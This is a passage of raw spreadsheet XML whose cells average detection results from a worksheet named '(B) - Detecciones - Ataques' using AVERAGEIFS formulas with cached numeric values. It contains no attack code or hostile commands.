      <c r="AB183" s="271"/>
      <c r="AC183" s="271"/>
      <c r="AD183" s="271"/>
      <c r="AE183" s="271"/>
      <c r="AF183" s="271"/>
      <c r="AG183" s="271"/>
      <c r="AH183" s="352" t="s">
        <v>1138</v>
      </c>
      <c r="AI183" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AV$131)
</f>
        <v>0</v>
      </c>
      <c r="AJ183" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AV$131)
</f>
        <v>0</v>
      </c>
      <c r="AK183" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AV$131)
</f>
        <v>0</v>
      </c>
      <c r="AL183" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AV$131)
</f>
        <v>0.6666666667</v>
      </c>
      <c r="AM183" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AV$131)
</f>
        <v>0</v>
      </c>
      <c r="AN183" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AV$131)
</f>
        <v>0</v>
      </c>
      <c r="AO183" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AV$131)
</f>
        <v>0</v>
      </c>
      <c r="AP183" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AV$131)
</f>
        <v>1</v>
      </c>
      <c r="AQ183" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AV$131)
</f>
        <v>0</v>
      </c>
      <c r="AR183" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AV$131)
</f>
        <v>0</v>
      </c>
      <c r="AS183" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AV$131)
</f>
        <v>0</v>
      </c>
      <c r="AT183" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AV$131)
</f>
        <v>1</v>
      </c>
      <c r="AU183" s="512"/>
      <c r="AV183" s="512"/>
      <c r="AW183" s="512"/>
      <c r="AX183" s="512"/>
      <c r="AY183" s="512"/>
      <c r="AZ183" s="512"/>
      <c r="BA183" s="512"/>
      <c r="BB183" s="512"/>
      <c r="BC183" s="512"/>
      <c r="BD183" s="512"/>
      <c r="BE183" s="512"/>
      <c r="BF183" s="512"/>
      <c r="BG183" s="512"/>
      <c r="BH183" s="512"/>
      <c r="BI183" s="512"/>
      <c r="BJ183" s="512"/>
      <c r="BK183" s="512"/>
      <c r="BL183" s="512"/>
      <c r="BM183" s="512"/>
      <c r="BN183" s="512"/>
      <c r="BO183" s="512"/>
      <c r="BP183" s="512"/>
      <c r="BQ183" s="512"/>
      <c r="BR183" s="512"/>
      <c r="BS183" s="512"/>
      <c r="BT183" s="512"/>
      <c r="BU183" s="512"/>
      <c r="BV183" s="512"/>
      <c r="BW183" s="512"/>
      <c r="BX183" s="512"/>
      <c r="BY183" s="512"/>
      <c r="BZ183" s="512"/>
      <c r="CA183" s="512"/>
      <c r="CB183" s="512"/>
      <c r="CC183" s="512"/>
      <c r="CD183" s="512"/>
      <c r="CE183" s="512"/>
      <c r="CF183" s="512"/>
      <c r="CG183" s="512"/>
      <c r="CH183" s="512"/>
      <c r="CI183" s="512"/>
      <c r="CJ183" s="512"/>
      <c r="CK183" s="512"/>
      <c r="CL183" s="512"/>
      <c r="CM183" s="512"/>
      <c r="CN183" s="512"/>
      <c r="CO183" s="512"/>
      <c r="CP183" s="512"/>
      <c r="CQ183" s="512"/>
      <c r="CR183" s="512"/>
      <c r="CS183" s="512"/>
      <c r="CT183" s="512"/>
      <c r="CU183" s="512"/>
      <c r="CV183" s="512"/>
      <c r="CW183" s="512"/>
      <c r="CX183" s="512"/>
      <c r="CY183" s="512"/>
      <c r="CZ183" s="512"/>
      <c r="DA183" s="512"/>
      <c r="DB183" s="512"/>
      <c r="DC183" s="512"/>
      <c r="DD183" s="512"/>
      <c r="DE183" s="512"/>
      <c r="DF183" s="512"/>
      <c r="DG183" s="512"/>
      <c r="DH183" s="512"/>
      <c r="DI183" s="512"/>
      <c r="DJ183" s="512"/>
      <c r="DK183" s="271"/>
    </row>
    <row r="184">
      <c r="K184" s="173"/>
      <c r="N184" s="173"/>
      <c r="Q184" s="271"/>
      <c r="R184" s="510"/>
      <c r="S184" s="510"/>
      <c r="T184" s="510"/>
      <c r="U184" s="510"/>
      <c r="V184" s="510"/>
      <c r="W184" s="510"/>
      <c r="X184" s="271"/>
      <c r="Y184" s="271"/>
      <c r="Z184" s="271"/>
      <c r="AA184" s="271"/>
      <c r="AB184" s="271"/>
      <c r="AC184" s="271"/>
      <c r="AD184" s="271"/>
      <c r="AE184" s="271"/>
      <c r="AF184" s="271"/>
      <c r="AG184" s="271"/>
      <c r="AH184" s="352" t="s">
        <v>974</v>
      </c>
      <c r="AI184" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AJ184" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AK184" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AL184" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AM184" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AN184" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO184" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP184" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ184" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AR184" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AS184" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT184" s="549" t="s">
        <v>12</v>
      </c>
      <c r="AU184" s="512"/>
      <c r="AV184" s="512"/>
      <c r="AW184" s="512"/>
      <c r="AX184" s="512"/>
      <c r="AY184" s="512"/>
      <c r="AZ184" s="512"/>
      <c r="BA184" s="512"/>
      <c r="BB184" s="512"/>
      <c r="BC184" s="512"/>
      <c r="BD184" s="512"/>
      <c r="BE184" s="512"/>
      <c r="BF184" s="512"/>
      <c r="BG184" s="512"/>
      <c r="BH184" s="512"/>
      <c r="BI184" s="512"/>
      <c r="BJ184" s="512"/>
      <c r="BK184" s="512"/>
      <c r="BL184" s="512"/>
      <c r="BM184" s="512"/>
      <c r="BN184" s="512"/>
      <c r="BO184" s="512"/>
      <c r="BP184" s="512"/>
      <c r="BQ184" s="512"/>
      <c r="BR184" s="512"/>
      <c r="BS184" s="512"/>
      <c r="BT184" s="512"/>
      <c r="BU184" s="512"/>
      <c r="BV184" s="512"/>
      <c r="BW184" s="512"/>
      <c r="BX184" s="512"/>
      <c r="BY184" s="512"/>
      <c r="BZ184" s="512"/>
      <c r="CA184" s="512"/>
      <c r="CB184" s="512"/>
      <c r="CC184" s="512"/>
      <c r="CD184" s="512"/>
      <c r="CE184" s="512"/>
      <c r="CF184" s="512"/>
      <c r="CG184" s="512"/>
      <c r="CH184" s="512"/>
      <c r="CI184" s="512"/>
      <c r="CJ184" s="512"/>
      <c r="CK184" s="512"/>
      <c r="CL184" s="512"/>
      <c r="CM184" s="512"/>
      <c r="CN184" s="512"/>
      <c r="CO184" s="512"/>
      <c r="CP184" s="512"/>
      <c r="CQ184" s="512"/>
      <c r="CR184" s="512"/>
      <c r="CS184" s="512"/>
      <c r="CT184" s="512"/>
      <c r="CU184" s="512"/>
      <c r="CV184" s="512"/>
      <c r="CW184" s="512"/>
      <c r="CX184" s="512"/>
      <c r="CY184" s="512"/>
      <c r="CZ184" s="512"/>
      <c r="DA184" s="512"/>
      <c r="DB184" s="512"/>
      <c r="DC184" s="512"/>
      <c r="DD184" s="512"/>
      <c r="DE184" s="512"/>
      <c r="DF184" s="512"/>
      <c r="DG184" s="512"/>
      <c r="DH184" s="512"/>
      <c r="DI184" s="512"/>
      <c r="DJ184" s="512"/>
      <c r="DK184" s="271"/>
    </row>
    <row r="185">
      <c r="K185" s="173"/>
      <c r="N185" s="173"/>
      <c r="Q185" s="271"/>
      <c r="R185" s="510"/>
      <c r="S185" s="510"/>
      <c r="T185" s="510"/>
      <c r="U185" s="510"/>
      <c r="V185" s="510"/>
      <c r="W185" s="510"/>
      <c r="X185" s="271"/>
      <c r="Y185" s="271"/>
      <c r="Z185" s="271"/>
      <c r="AA185" s="271"/>
      <c r="AB185" s="271"/>
      <c r="AC185" s="271"/>
      <c r="AD185" s="271"/>
      <c r="AE185" s="271"/>
      <c r="AF185" s="271"/>
      <c r="AG185" s="271"/>
      <c r="AH185" s="352" t="s">
        <v>1108</v>
      </c>
      <c r="AI185" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AX$131)
</f>
        <v>0</v>
      </c>
      <c r="AJ185" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AX$131)
</f>
        <v>1</v>
      </c>
      <c r="AK185" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AX$131)
</f>
        <v>1</v>
      </c>
      <c r="AL185" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AX$131)
</f>
        <v>1</v>
      </c>
      <c r="AM185" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AX$131)
</f>
        <v>0</v>
      </c>
      <c r="AN185" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AX$131)
</f>
        <v>1</v>
      </c>
      <c r="AO185" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AX$131)
</f>
        <v>1</v>
      </c>
      <c r="AP185" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AX$131)
</f>
        <v>1</v>
      </c>
      <c r="AQ185" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AX$131)
</f>
        <v>0</v>
      </c>
      <c r="AR185" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AX$131)
</f>
        <v>1</v>
      </c>
      <c r="AS185" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AX$131)
</f>
        <v>1</v>
      </c>
      <c r="AT185" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AX$131)
</f>
        <v>1</v>
      </c>
      <c r="AU185" s="512"/>
      <c r="AV185" s="512"/>
      <c r="AW185" s="512"/>
      <c r="AX185" s="512"/>
      <c r="AY185" s="512"/>
      <c r="AZ185" s="512"/>
      <c r="BA185" s="512"/>
      <c r="BB185" s="512"/>
      <c r="BC185" s="512"/>
      <c r="BD185" s="512"/>
      <c r="BE185" s="512"/>
      <c r="BF185" s="512"/>
      <c r="BG185" s="512"/>
      <c r="BH185" s="512"/>
      <c r="BI185" s="512"/>
      <c r="BJ185" s="512"/>
      <c r="BK185" s="512"/>
      <c r="BL185" s="512"/>
      <c r="BM185" s="512"/>
      <c r="BN185" s="512"/>
      <c r="BO185" s="512"/>
      <c r="BP185" s="512"/>
      <c r="BQ185" s="512"/>
      <c r="BR185" s="512"/>
      <c r="BS185" s="512"/>
      <c r="BT185" s="512"/>
      <c r="BU185" s="512"/>
      <c r="BV185" s="512"/>
      <c r="BW185" s="512"/>
      <c r="BX185" s="512"/>
      <c r="BY185" s="512"/>
      <c r="BZ185" s="512"/>
      <c r="CA185" s="512"/>
      <c r="CB185" s="512"/>
      <c r="CC185" s="512"/>
      <c r="CD185" s="512"/>
      <c r="CE185" s="512"/>
      <c r="CF185" s="512"/>
      <c r="CG185" s="512"/>
      <c r="CH185" s="512"/>
      <c r="CI185" s="512"/>
      <c r="CJ185" s="512"/>
      <c r="CK185" s="512"/>
      <c r="CL185" s="512"/>
      <c r="CM185" s="512"/>
      <c r="CN185" s="512"/>
      <c r="CO185" s="512"/>
      <c r="CP185" s="512"/>
      <c r="CQ185" s="512"/>
      <c r="CR185" s="512"/>
      <c r="CS185" s="512"/>
      <c r="CT185" s="512"/>
      <c r="CU185" s="512"/>
      <c r="CV185" s="512"/>
      <c r="CW185" s="512"/>
      <c r="CX185" s="512"/>
      <c r="CY185" s="512"/>
      <c r="CZ185" s="512"/>
      <c r="DA185" s="512"/>
      <c r="DB185" s="512"/>
      <c r="DC185" s="512"/>
      <c r="DD185" s="512"/>
      <c r="DE185" s="512"/>
      <c r="DF185" s="512"/>
      <c r="DG185" s="512"/>
      <c r="DH185" s="512"/>
      <c r="DI185" s="512"/>
      <c r="DJ185" s="512"/>
      <c r="DK185" s="271"/>
    </row>
    <row r="186">
      <c r="K186" s="173"/>
      <c r="N186" s="173"/>
      <c r="Q186" s="271"/>
      <c r="R186" s="510"/>
      <c r="S186" s="510"/>
      <c r="T186" s="510"/>
      <c r="U186" s="510"/>
      <c r="V186" s="510"/>
      <c r="W186" s="510"/>
      <c r="X186" s="271"/>
      <c r="Y186" s="271"/>
      <c r="Z186" s="271"/>
      <c r="AA186" s="271"/>
      <c r="AB186" s="271"/>
      <c r="AC186" s="271"/>
      <c r="AD186" s="271"/>
      <c r="AE186" s="271"/>
      <c r="AF186" s="271"/>
      <c r="AG186" s="271"/>
      <c r="AH186" s="352" t="s">
        <v>1702</v>
      </c>
      <c r="AI186" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AJ186" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AK186" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AL186" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AM186" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AN186" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO186" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP186" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ186" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AR186" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AS186" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT186" s="549" t="s">
        <v>12</v>
      </c>
      <c r="AU186" s="512"/>
      <c r="AV186" s="512"/>
      <c r="AW186" s="512"/>
      <c r="AX186" s="512"/>
      <c r="AY186" s="512"/>
      <c r="AZ186" s="512"/>
      <c r="BA186" s="512"/>
      <c r="BB186" s="512"/>
      <c r="BC186" s="512"/>
      <c r="BD186" s="512"/>
      <c r="BE186" s="512"/>
      <c r="BF186" s="512"/>
      <c r="BG186" s="512"/>
      <c r="BH186" s="512"/>
      <c r="BI186" s="512"/>
      <c r="BJ186" s="512"/>
      <c r="BK186" s="512"/>
      <c r="BL186" s="512"/>
      <c r="BM186" s="512"/>
      <c r="BN186" s="512"/>
      <c r="BO186" s="512"/>
      <c r="BP186" s="512"/>
      <c r="BQ186" s="512"/>
      <c r="BR186" s="512"/>
      <c r="BS186" s="512"/>
      <c r="BT186" s="512"/>
      <c r="BU186" s="512"/>
      <c r="BV186" s="512"/>
      <c r="BW186" s="512"/>
      <c r="BX186" s="512"/>
      <c r="BY186" s="512"/>
      <c r="BZ186" s="512"/>
      <c r="CA186" s="512"/>
      <c r="CB186" s="512"/>
      <c r="CC186" s="512"/>
      <c r="CD186" s="512"/>
      <c r="CE186" s="512"/>
      <c r="CF186" s="512"/>
      <c r="CG186" s="512"/>
      <c r="CH186" s="512"/>
      <c r="CI186" s="512"/>
      <c r="CJ186" s="512"/>
      <c r="CK186" s="512"/>
      <c r="CL186" s="512"/>
      <c r="CM186" s="512"/>
      <c r="CN186" s="512"/>
      <c r="CO186" s="512"/>
      <c r="CP186" s="512"/>
      <c r="CQ186" s="512"/>
      <c r="CR186" s="512"/>
      <c r="CS186" s="512"/>
      <c r="CT186" s="512"/>
      <c r="CU186" s="512"/>
      <c r="CV186" s="512"/>
      <c r="CW186" s="512"/>
      <c r="CX186" s="512"/>
      <c r="CY186" s="512"/>
      <c r="CZ186" s="512"/>
      <c r="DA186" s="512"/>
      <c r="DB186" s="512"/>
      <c r="DC186" s="512"/>
      <c r="DD186" s="512"/>
      <c r="DE186" s="512"/>
      <c r="DF186" s="512"/>
      <c r="DG186" s="512"/>
      <c r="DH186" s="512"/>
      <c r="DI186" s="512"/>
      <c r="DJ186" s="512"/>
      <c r="DK186" s="271"/>
    </row>
    <row r="187">
      <c r="K187" s="173"/>
      <c r="N187" s="173"/>
      <c r="Q187" s="271"/>
      <c r="R187" s="510"/>
      <c r="S187" s="510"/>
      <c r="T187" s="510"/>
      <c r="U187" s="510"/>
      <c r="V187" s="510"/>
      <c r="W187" s="510"/>
      <c r="X187" s="271"/>
      <c r="Y187" s="271"/>
      <c r="Z187" s="271"/>
      <c r="AA187" s="271"/>
      <c r="AB187" s="271"/>
      <c r="AC187" s="271"/>
      <c r="AD187" s="271"/>
      <c r="AE187" s="271"/>
      <c r="AF187" s="271"/>
      <c r="AG187" s="271"/>
      <c r="AH187" s="352" t="s">
        <v>1626</v>
      </c>
      <c r="AI187" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AZ$131)
</f>
        <v>0</v>
      </c>
      <c r="AJ187" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AZ$131)
</f>
        <v>0.5</v>
      </c>
      <c r="AK187" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AZ$131)
</f>
        <v>0.5</v>
      </c>
      <c r="AL187" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AZ$131)
</f>
        <v>0.5</v>
      </c>
      <c r="AM187" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AZ$131)
</f>
        <v>0</v>
      </c>
      <c r="AN187" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AZ$131)
</f>
        <v>0.5</v>
      </c>
      <c r="AO187" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AZ$131)
</f>
        <v>0.5</v>
      </c>
      <c r="AP187" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AZ$131)
</f>
        <v>0.5</v>
      </c>
      <c r="AQ187" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AZ$131)
</f>
        <v>0</v>
      </c>
      <c r="AR187" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AZ$131)
</f>
        <v>0.5</v>
      </c>
      <c r="AS187" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AZ$131)
</f>
        <v>0.5</v>
      </c>
      <c r="AT187" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AZ$131)
</f>
        <v>0.5</v>
      </c>
      <c r="AU187" s="512"/>
      <c r="AV187" s="512"/>
      <c r="AW187" s="512"/>
      <c r="AX187" s="512"/>
      <c r="AY187" s="512"/>
      <c r="AZ187" s="512"/>
      <c r="BA187" s="512"/>
      <c r="BB187" s="512"/>
      <c r="BC187" s="512"/>
      <c r="BD187" s="512"/>
      <c r="BE187" s="512"/>
      <c r="BF187" s="512"/>
      <c r="BG187" s="512"/>
      <c r="BH187" s="512"/>
      <c r="BI187" s="512"/>
      <c r="BJ187" s="512"/>
      <c r="BK187" s="512"/>
      <c r="BL187" s="512"/>
      <c r="BM187" s="512"/>
      <c r="BN187" s="512"/>
      <c r="BO187" s="512"/>
      <c r="BP187" s="512"/>
      <c r="BQ187" s="512"/>
      <c r="BR187" s="512"/>
      <c r="BS187" s="512"/>
      <c r="BT187" s="512"/>
      <c r="BU187" s="512"/>
      <c r="BV187" s="512"/>
      <c r="BW187" s="512"/>
      <c r="BX187" s="512"/>
      <c r="BY187" s="512"/>
      <c r="BZ187" s="512"/>
      <c r="CA187" s="512"/>
      <c r="CB187" s="512"/>
      <c r="CC187" s="512"/>
      <c r="CD187" s="512"/>
      <c r="CE187" s="512"/>
      <c r="CF187" s="512"/>
      <c r="CG187" s="512"/>
      <c r="CH187" s="512"/>
      <c r="CI187" s="512"/>
      <c r="CJ187" s="512"/>
      <c r="CK187" s="512"/>
      <c r="CL187" s="512"/>
      <c r="CM187" s="512"/>
      <c r="CN187" s="512"/>
      <c r="CO187" s="512"/>
      <c r="CP187" s="512"/>
      <c r="CQ187" s="512"/>
      <c r="CR187" s="512"/>
      <c r="CS187" s="512"/>
      <c r="CT187" s="512"/>
      <c r="CU187" s="512"/>
      <c r="CV187" s="512"/>
      <c r="CW187" s="512"/>
      <c r="CX187" s="512"/>
      <c r="CY187" s="512"/>
      <c r="CZ187" s="512"/>
      <c r="DA187" s="512"/>
      <c r="DB187" s="512"/>
      <c r="DC187" s="512"/>
      <c r="DD187" s="512"/>
      <c r="DE187" s="512"/>
      <c r="DF187" s="512"/>
      <c r="DG187" s="512"/>
      <c r="DH187" s="512"/>
      <c r="DI187" s="512"/>
      <c r="DJ187" s="512"/>
      <c r="DK187" s="271"/>
    </row>
    <row r="188">
      <c r="K188" s="173"/>
      <c r="N188" s="173"/>
      <c r="Q188" s="271"/>
      <c r="R188" s="510"/>
      <c r="S188" s="510"/>
      <c r="T188" s="510"/>
      <c r="U188" s="510"/>
      <c r="V188" s="510"/>
      <c r="W188" s="510"/>
      <c r="X188" s="271"/>
      <c r="Y188" s="271"/>
      <c r="Z188" s="271"/>
      <c r="AA188" s="271"/>
      <c r="AB188" s="271"/>
      <c r="AC188" s="271"/>
      <c r="AD188" s="271"/>
      <c r="AE188" s="271"/>
      <c r="AF188" s="271"/>
      <c r="AG188" s="271"/>
      <c r="AH188" s="552" t="s">
        <v>636</v>
      </c>
      <c r="AI188" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BA$131)
</f>
        <v>0</v>
      </c>
      <c r="AJ188" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BA$131)
</f>
        <v>0</v>
      </c>
      <c r="AK188" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BA$131)
</f>
        <v>0</v>
      </c>
      <c r="AL188" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BA$131)
</f>
        <v>0</v>
      </c>
      <c r="AM188" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BA$131)
</f>
        <v>0</v>
      </c>
      <c r="AN188" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BA$131)
</f>
        <v>0</v>
      </c>
      <c r="AO188" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BA$131)
</f>
        <v>0</v>
      </c>
      <c r="AP188" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BA$131)
</f>
        <v>0</v>
      </c>
      <c r="AQ188" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BA$131)
</f>
        <v>0</v>
      </c>
      <c r="AR188" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BA$131)
</f>
        <v>0</v>
      </c>
      <c r="AS188" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BA$131)
</f>
        <v>0</v>
      </c>
      <c r="AT188" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BA$131)
</f>
        <v>0</v>
      </c>
      <c r="AU188" s="512"/>
      <c r="AV188" s="512"/>
